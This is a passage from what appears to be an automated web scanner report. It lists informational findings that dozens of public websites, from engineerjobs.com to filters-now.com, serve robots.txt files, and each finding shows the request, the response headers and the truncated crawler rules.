Date: Tue, 03 May 2011 11:07:17 GMT
Server: Apache
Last-Modified: Sat, 10 Apr 2010 04:06:35 GMT
ETag: "18354-17c-483da09a8a8c0"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /includes/
Disallow: /language/
Disal
...[SNIP]...

26.345. http://www.engineerjobs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.engineerjobs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.engineerjobs.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Last-Modified: Wed, 06 Oct 2010 15:58:59 GMT
ETag: "1f9978-147-dafe76c0"
Accept-Ranges: bytes
Content-Length: 327
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /jobsearch.php
Disallow: /jobdetails.php
Disallow: /company.php
Disallow: /recruiting-center
Disallow: /resumes
Disallow: /engineering-employers.php?*&state=*
Disallow: /engine
...[SNIP]...

26.346. http://www.englishpage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.englishpage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.englishpage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:42 GMT
Server: Apache
Last-Modified: Tue, 19 Jul 2005 21:39:29 GMT
ETag: "2e82de-20-42dd7311"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/

26.347. http://www.entertainment-savings-offers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.entertainment-savings-offers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.entertainment-savings-offers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:40 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b PHP/5.2.5
Last-Modified: Thu, 11 Jun 2009 18:21:46 GMT
ETag: "148b23-4d-46c16aa1dc280"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /scripts/

User-Agent: Googlebot
Disallow: /scripts/

26.348. http://www.enzymatictherapy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.enzymatictherapy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enzymatictherapy.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 21 Mar 2011 20:57:58 GMT
Accept-Ranges: bytes
ETag: "725ccaa8ae8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:53 GMT
Connection: close
Content-Length: 286

User-agent: *
Disallow: /cmsdesk
Disallow: /cmssitemanager
Disallow: /ecommerce
Disallow: /membership
Disallow: /where-to-buy.aspx
Disallow: /etiholdings/privacy-policy.aspx
Disallow: /etiholdi
...[SNIP]...

26.349. http://www.epdfsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.epdfsearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epdfsearch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 19 Dec 2010 17:04:03 GMT
ETag: "37b026d-11d-497c663f286c0"
Accept-Ranges: bytes
Content-Length: 285
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /admin/
Disallow: /images/
Disallow: /includes/
Disallow: /logo/
Disallow: /templates/
Disallow: /members/
Disallow: /temp/
Disallow: /theme/
Disallow: /download/
Disallow:
...[SNIP]...

26.350. http://www.equestriancollections.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equestriancollections.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.equestriancollections.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:44:33 GMT
Content-Length: 399
Content-Type: text/plain
Content-Location: http://www.equestriancollections.com/robots.txt
Last-Modified: Wed, 28 Nov 2007 15:59:48 GMT
Accept-Ranges: bytes
ETag: "be5c17b4d731c81:6579"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /ma
...[SNIP]...

26.351. http://www.esa.int/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.esa.int
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.esa.int

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:14 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n7 ( iad-agg-n6), ht iad-agg-n6.panthercdn.com
ETag: "f9b34-10ce-43ecae546bdc0"
Cache-Control: max-age=600
Expires: Tue, 03 May 2011 10:43:05 GMT
Age: 9
Content-Length: 4302
Content-Type: text/plain
Last-Modified: Tue, 13 Nov 2007 08:04:17 GMT
Connection: close

# File to exclude robots from the access to the Web Portal
# Template has been taken from www.html.it

User-agent: Microsoft URL
Disallow: /

User-agent: webmirror
Disallow: /

User-agent: webcopy
Dis
...[SNIP]...

26.352. http://www.europcar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.europcar.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.europcar.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Tue, 03 May 2011 10:26:07 GMT
Content-Length: 69
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.europcar.com/sitemap.xml

26.353. http://www.evanscycles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.evanscycles.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evanscycles.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:18 GMT
Server: Apache/2.2.3 (Debian) DAV/2 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Fri, 03 Sep 2010 11:21:22 GMT
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /paypal/

26.354. http://www.eventsinyuma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eventsinyuma.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eventsinyuma.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 03 May 2011 10:55:41 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-Runtime: 4
ETag: "6734dba498bdf8de000ea94632e9c834"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 579
Set-Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlMzJhYmM3ZGY2MGIxOTY1NzdmMjRlOGMwMjQxMTFlMWY%3D--8dc732ee2ee796edc896714f3484586ac3fb62d7; path=/; expires=Wed, 03-Aug-2011 10:55:41 GMT; HttpOnly

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...

26.355. http://www.everythingofficefurniture.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everythingofficefurniture.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.everythingofficefurniture.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:35:28 GMT
Last-Modified: Tue, 19 Apr 2011 05:05:08 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.356. http://www.evworld.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.evworld.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evworld.com

Response

HTTP/1.1 200 OK
Content-Length: 569
Content-Type: text/plain
Content-Location: http://www.evworld.com/robots.txt
Last-Modified: Tue, 04 Jan 2011 21:14:47 GMT
Accept-Ranges: bytes
ETag: "f9e8936a54accb1:10fd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:46:24 GMT
Connection: close

# Robots.txt file from http://www.evworld.com
#
# Bans all robots will spider the domain

User-agent: *
Disallow:application.cfm
Disallow: /admin/
Disallow:/admin/index.cfm
Disallow:/adbanne
...[SNIP]...

26.357. http://www.eweb.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eweb.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eweb.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 31 Dec 2008 22:16:30 GMT
Accept-Ranges: bytes
ETag: "4848cb6e956bc91:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:21:48 GMT
Connection: close
Content-Length: 1257

# robots.txt for http://www.eweb.org/
# Do Not Index this file - Larry Spidey

User-agent: * # all web crawlers and searchers
Disallow: /ContactEmails.xml #
...[SNIP]...

26.358. http://www.examiner-enterprise.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.examiner-enterprise.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.examiner-enterprise.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 11:08:21 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4998
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: examiner-enterprise.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.359. http://www.expedient.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedient.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expedient.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:02:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 28 Sep 2010 16:01:12 GMT
ETag: "56c155-1a2-f430e200"
Accept-Ranges: bytes
Content-Length: 418
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.expedient.com/sitemap.xml
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /promotions/
Disallow: /shared/
Disallow: /Template
...[SNIP]...

26.360. http://www.exploregeorgia.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exploregeorgia.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.exploregeorgia.org

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/plain
Last-Modified: Fri, 17 Oct 2008 16:27:16 GMT
Accept-Ranges: bytes
ETag: "4efcfd377530c91:422f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:00:26 GMT
Connection: close

# robots.txt for http://www.exploregeorgia.org/
# Allow Agents
User-agent: *
# Blocked Pages
Disallow: /admin/ # This is a restricted Admin
# Sitemap
sitemap: http://www.exploregeorgia.org/sitem
...[SNIP]...

26.361. http://www.exploringthenorth.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exploringthenorth.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.exploringthenorth.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:31 GMT
Server: Apache/1.3.27 (Unix) PHP/4.3.10
Last-Modified: Thu, 01 May 2003 16:53:12 GMT
ETag: "d-1f-3eb150f8"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats

26.362. http://www.expressionery.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expressionery.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expressionery.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 15 Dec 2010 19:47:54 GMT
Accept-Ranges: bytes
ETag: "c0c511f7909ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:21 GMT
Connection: close
Content-Length: 45
Set-Cookie: BIGipServerexpressionery=4162588844.20480.0000; path=/

User-agent: *
Disallow: /cart.aspx
Allow: /

26.363. http://www.extrabux.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.extrabux.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extrabux.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 03 May 2011 10:34:39 GMT
ETag: "12e4467-6f-47f5c37e02d80"
Last-Modified: Fri, 12 Feb 2010 00:19:18 GMT
Server: Apache/2.2.12 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 111
Connection: Close

User-agent: *
Disallow: /products/transfer/
Disallow: /merchants/transfer/
Disallow: /stores/transfer/
Allow: /

26.364. http://www.extremecow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.extremecow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extremecow.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 27 Apr 2011 13:52:24 GMT
ETag: "4fce2c0-3b-4a1e6c0151600"
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Content-Length: 59
Date: Tue, 03 May 2011 11:19:32 GMT
X-Varnish: 1369022954
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /

User-agent: Googlebot
Disallow: /

26.365. http://www.extremeoverclocking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.extremeoverclocking.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extremeoverclocking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:14 GMT
Server: Apache
Last-Modified: Tue, 18 Oct 2005 18:15:37 GMT
ETag: "1050346-a1-4036b4f7fc440"
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

User-agent: psbot
Disallow: /

User-agent: *
Disallow: /contact_info.php
Disallow: /contact_info.html
Disallow: /lists/

26.366. http://www.eyny.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eyny.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eyny.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-1600895116"
Last-Modified: Wed, 28 Oct 2009 16:45:55 GMT
Content-Length: 697
Connection: close
Date: Tue, 03 May 2011 10:16:54 GMT
Server: Apache/2.0.59

#
# robots.txt for Discuz! Board
# Version 7.0.0
#

User-agent: YahooYSMcm
Disallow:

User-agent: *

Disallow: /admin/
Disallow: /api/
Disallow: /attachments/
Disallow: /images/
Disallow: /install/
Di
...[SNIP]...

26.367. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.53.89.79
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.368. http://www.familycorner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.familycorner.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.familycorner.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:03 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Mon, 22 Feb 2010 23:49:26 GMT
ETag: "e8f91e-38-4803915518d80"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerFamilycorner_www_pool=452661420.20480.0000; path=/

User-agent: *
Allow: /
Disallow: /forum/showgroups.php

26.369. http://www.familygetaway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.familygetaway.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.familygetaway.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:56 GMT
Server: Apache
Last-Modified: Mon, 02 May 2011 18:20:46 GMT
ETag: "a020b-1991-4a24f150afb80"
Accept-Ranges: bytes
Content-Length: 6545
Connection: close
Content-Type: text/plain; charset=iso-8859-1

Sitemap: http://www.luxurylink.com/sitemap.xml

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /travel-offers/listing.php

User-agent: OmniExplorer_Bot
Disallow: /

User-agen
...[SNIP]...

26.370. http://www.fantasysharks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fantasysharks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fantasysharks.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:58 GMT
Server: Apache/2.2.17
Last-Modified: Sat, 16 Jul 2005 12:30:36 GMT
ETag: "10839ee-8a6-3fc03888a5300"
Accept-Ranges: bytes
Content-Length: 2214
Connection: close
Content-Type: text/plain

#robots.txt for http://www.fantasysharks.com

User-agent: *
Disallow: /_borders/
Disallow: /_derived/
Disallow: /_fpclass/
Disallow: /_pgtres/
Disallow: /_private/
Disallow: /_sharedtemplates/
Disallo
...[SNIP]...

26.371. http://www.farmland.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.farmland.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.farmland.org

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: text/plain
Content-Location: http://www.farmland.org/robots.txt
Last-Modified: Tue, 27 May 2008 15:56:41 GMT
Accept-Ranges: bytes
ETag: "8082d94012c0c81:5ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:06 GMT
Connection: close

User-Agent: *
Disallow: /reports/
Disallow: /oldsite/
Disallow: /farmingontheedge/
Allow: /

26.372. http://www.fastmail.fm/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastmail.fm
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fastmail.fm

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Tue, 03 May 2011 10:22:03 GMT
Content-Type: text/plain
Content-Length: 179
Last-Modified: Wed, 13 Apr 2011 06:07:32 GMT
Connection: close
Expires: Tue, 10 May 2011 10:22:03 GMT
Cache-Control: max-age=604800
Cache-Control: public
Accept-Ranges: bytes

User-agent: *
Disallow: /mail1
Disallow: /mail2
Disallow: /mail3
Disallow: /mail4
Disallow: /beta
Disallow: /web5
Disallow: /web6
Disallow: /web7
Disallow: /web8
Disallow: /SOAP

26.373. http://www.fastrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastrecipes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fastrecipes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:25:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 04 Nov 2009 09:33:28 GMT
ETag: "4900f2c-234-477884d996a00"
Accept-Ranges: bytes
Content-Length: 564
Connection: close
Content-Type: text/plain

User-agent: *Disallow: /administrator/Disallow: /cache/Disallow: /components/Disallow: /images/Disallow: /includes/Disallow: /installation/Disallow: /language/Disallow: /libraries/Disallow: /media/Dis
...[SNIP]...

26.374. http://www.faunaclassifieds.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.faunaclassifieds.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.faunaclassifieds.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:50 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 07:34:46 GMT
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /pics/
Disallow: /videos/
Disallow: /lawsuit/
Disallow: /images/

26.375. http://www.fbschedules.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fbschedules.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fbschedules.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 09 Mar 2011 15:55:11 GMT
Accept-Ranges: bytes
Content-Length: 161
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cpanel/

Sitemap: http://www.fbschedules.com/sitemap.xml.gz
Sitemap: http://www.fbschedules.com/sitemap1.xml.gz

26.376. http://www.feetpics.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.feetpics.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.feetpics.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:28 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.6
Last-Modified: Sat, 15 May 2010 22:25:01 GMT
ETag: "11e1733-24-4bef1f3d"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: Baiduspider
Disallow: /

26.377. http://www.festfoods.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.festfoods.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.festfoods.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 10:46:04 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-eacdndmj=3CB0F424661D80A0FCF7A43668C564F3; path=/
Last-Modified: Thu, 17 Dec 2009 09:04:07 GMT
Content-Length: 286

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

26.378. http://www.fibre2fashion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fibre2fashion.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fibre2fashion.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 09:52:48 GMT
Server: Microsoft-IIS/6.0
Content-Length: 769
Content-Type: text/plain
Last-Modified: Wed, 05 May 2010 06:59:43 GMT
Accept-Ranges: bytes
ETag: "8bca3b8a20ecca1:23a"
X-Powered-By: ASP.NET
Age: 4062
X-Cache: HIT from cdn.fibre2fashion.com
Via: 1.0 cdn.fibre2fashion.com:3128 (squid/2.6.STABLE21)
Connection: close

User-agent: TeleportPro
Disallow: /

User-agent: spanner
Disallow: /

User-agent: Harvest/1.5
Disallow: /

User-agent: ExtractorPro
Disallow: /

User-agent: LinkWalker
Disallow: /

User
...[SNIP]...

26.379. http://www.file-extension.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.file-extension.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.file-extension.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 04 Oct 2010 15:01:03 GMT
Accept-Ranges: bytes
ETag: "51b518f7d463cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:46:23 GMT
Connection: close
Content-Length: 162

User-Agent: *
Disallow: /*.js$
Disallow: /*.css$
Disallow: /backedupfiles/
Disallow: /scan/registry/
Allow: /

Sitemap: http://www.file-extension.com/sitemap.xml

26.380. http://www.filekicker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filekicker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filekicker.com

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:25:00 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 31 Mar 2004 22:33:56 GMT
ETag: "16bc1a417017c41:f73"
Content-Length: 111

User-agent: SlySearch
Disallow: /
User-Agent: Ultraseek
Disallow: /
User-Agent: Inktomi Search
Disallow: /

26.381. http://www.filmjabber.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filmjabber.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filmjabber.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 mod_fastcgi/2.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 SVN/1.6.11
Last-Modified: Sun, 17 Jan 2010 01:39:31 GMT
ETag: "33f0020-50-4ee0fac0"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Sitemap: http://www.filmjabber.com/sitemap.xml

26.382. http://www.filters-now.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filters-now.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filters-now.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:04 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 16:16:42 GMT
